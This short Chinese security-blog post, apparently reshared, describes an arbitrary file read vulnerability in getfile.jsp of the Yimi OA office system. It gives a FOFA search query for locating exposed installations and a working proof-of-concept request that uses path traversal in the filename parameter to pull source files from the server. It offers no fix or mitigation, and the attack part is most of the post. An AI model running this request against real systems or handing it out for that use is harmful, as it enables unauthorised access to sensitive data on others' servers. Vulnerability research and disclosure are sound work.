0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可获取敏感信息。
![图片[1]-一米OA getfile.jsp 任意文件读取漏洞-安全小天地](https://img.godyu.com/2023/12/20231226124645706.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
fofa:app=”一米OA”
1.执行如下POC可以读取源码文件
/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp ![图片[2]-一米OA getfile.jsp 任意文件读取漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204647761.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容